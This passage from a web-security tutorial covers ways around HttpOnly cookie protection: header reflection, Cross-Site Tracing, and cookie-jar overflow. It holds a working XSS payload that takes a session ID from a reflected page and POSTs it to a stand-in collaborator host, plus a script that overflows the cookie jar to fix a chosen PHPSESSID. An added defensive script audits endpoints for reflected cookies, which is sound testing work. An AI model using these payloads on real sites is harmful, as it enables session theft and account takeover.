When this attribute is set, the client-side script is prevented from accessing the cookie (via JavaScript). Specifically, the HttpOnly cookie simply does not appear in the string returned by document.cookie.

Bypass HTTPOnly#

Header Reflection#

If a page reflects the request cookies in its response (for example a phpinfo page), the XSS can be abused to send a request to that page and read the cookies from the response body.

If any server-side endpoint echoes the raw session ID in the HTTP response (e.g., inside HTML comments or a debug block), you can bypass HttpOnly by using an XSS gadget to fetch that endpoint, extract the secret with a regular expression, and exfiltrate it.

Example XSS payload pattern:

```javascript
// Extract content between <!-- startscrmprint --> ... <!-- stopscrmprint -->
const re = /<!-- startscrmprint -->([\s\S]*?)<!-- stopscrmprint -->/;
fetch('/index.php?module=Touch&action=ws')
  .then(r => r.text())
  .then(t => {
    const m = re.exec(t);
    if (m) fetch(
      'https://collab/leak',
      { method: 'POST', body: JSON.stringify({ leak: btoa(m[1]) }) }
    );
  });
```

TRACE HTTP Method#

HttpOnly can also be bypassed with the TRACE HTTP method.

TRACE reflects the request we sent back in the response body, headers included. For example, if we send this request with curl, the Cookie header shows up in the response body:

```
$ curl -X TRACE -b 'name=value' 127.0.0.1

TRACE / HTTP/1.1
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
Host: 127.0.0.1
Accept: */*
Cookie: name=value
```
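Both bypasses above (a phpinfo-style page and a TRACE echo) share the same precondition: a response body that contains the value of an HttpOnly cookie. The check below is an added example, not code from the original notes, for a defender or QA engineer auditing their own endpoints: it parses a request's Cookie header and reports which cookie values are echoed in each response. The sample responses and the `/phpinfo.php`, `/trace` paths are constructed for the demonstration.

```javascript
// Added example (not part of the original notes): report which request cookies
// are reflected in a response body. Any HttpOnly cookie that shows up here can be
// read through an XSS gadget, which is exactly the bypass condition described above.

// Parse a Cookie request header into [name, value] pairs.
function parseCookieHeader(header) {
  return header.split(';').map(p => p.trim()).filter(Boolean)
    .map(p => { const i = p.indexOf('='); return i < 0 ? [p, ''] : [p.slice(0, i), p.slice(i + 1)]; });
}

// Return the names of cookies whose value occurs verbatim in the response body.
// Values shorter than minLength are ignored: short tokens such as "1" or "dark"
// would match by coincidence and only produce false positives.
function findReflectedCookies(cookieHeader, responseBody, minLength = 8) {
  const reflected = [];
  for (const [name, value] of parseCookieHeader(cookieHeader)) {
    if (value.length >= minLength && responseBody.includes(value)) reflected.push(name);
  }
  return reflected;
}

// Audit several responses at once; returns { path: [leakedCookieNames] }.
function auditResponses(cookieHeader, responses) {
  const findings = {};
  for (const [path, body] of Object.entries(responses)) {
    const leaked = findReflectedCookies(cookieHeader, body);
    if (leaked.length) findings[path] = leaked;
  }
  return findings;
}

// Constructed sample data (not captured from a real server).
const SAMPLE_COOKIE_HEADER = 'PHPSESSID=3f9a1c2b7e4d5a60; theme=dark; csrf=1';

// 1. A phpinfo()-style page that dumps $_COOKIE into the HTML.
const PHPINFO_BODY =
  '<tr><td class="e">$_COOKIE[\'PHPSESSID\']</td><td class="v">3f9a1c2b7e4d5a60</td></tr>\n' +
  '<tr><td class="e">$_COOKIE[\'theme\']</td><td class="v">dark</td></tr>';

// 2. A TRACE response that echoes the whole request, headers included.
const TRACE_BODY =
  'TRACE / HTTP/1.1\r\nHost: 127.0.0.1\r\n' +
  'Cookie: PHPSESSID=3f9a1c2b7e4d5a60; theme=dark; csrf=1\r\n\r\n';

// 3. A normal page that mentions the theme but never echoes the session ID.
const CLEAN_BODY = '<html><body>Welcome back, dark theme enabled</body></html>';

const SAMPLE_RESPONSES = { '/phpinfo.php': PHPINFO_BODY, '/trace': TRACE_BODY, '/': CLEAN_BODY };

console.log(auditResponses(SAMPLE_COOKIE_HEADER, SAMPLE_RESPONSES));
// { '/phpinfo.php': [ 'PHPSESSID' ], '/trace': [ 'PHPSESSID' ] }
```

In practice you would feed `auditResponses` the bodies of every endpoint a crawler or test suite fetched while holding a valid session; a non-empty result for the session cookie is the finding to fix (remove the debug page, disable TRACE on the server). The `minLength` cutoff is a pragmatic choice; lower it if your session IDs are short, which is a problem in itself.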

However, there is a big catch: the TRACE method is disabled on most web servers.

Not only that, if you attempt to send a TRACE request using JavaScript:

```javascript
var xmlhttp = new XMLHttpRequest();
var url = 'http://127.0.0.1/';

xmlhttp.withCredentials = true; // send cookie header
xmlhttp.open('TRACE', url, false);
xmlhttp.send();
```

- In Firefox 19.0.2 it will not work and returns an "Illegal Value" error.
- In Google Chrome 25.0.1364.172 it will not work and returns an "Uncaught Error: SecurityError: DOM Exception 18" error.

This is because modern browsers block the TRACE method in XMLHttpRequest to mitigate XST (cross-site tracing).

This is a serious vulnerability: easy to exploit, with critical impact (session smuggling). Chances are, though, you won't find it in the wild.

Source: https://owasp.org/www-community/attacks/Cross_Site_Tracing

Browsers limit the number of cookies they store per site. If we overflow the cookie jar, the oldest cookies are evicted.

That lets us overwrite an HttpOnly cookie: overflow the jar so it gets evicted, then set a cookie with the same name from JavaScript and the value we want. This is a session fixation attack.

```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i}; Secure`
}

// Set our controlled session
document.cookie = 'PHPSESSID=bb1410e408ed19ee2d1991f400ee7a08'

// Remove all cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```

Note that third-party cookies set for a different domain won't be overwritten.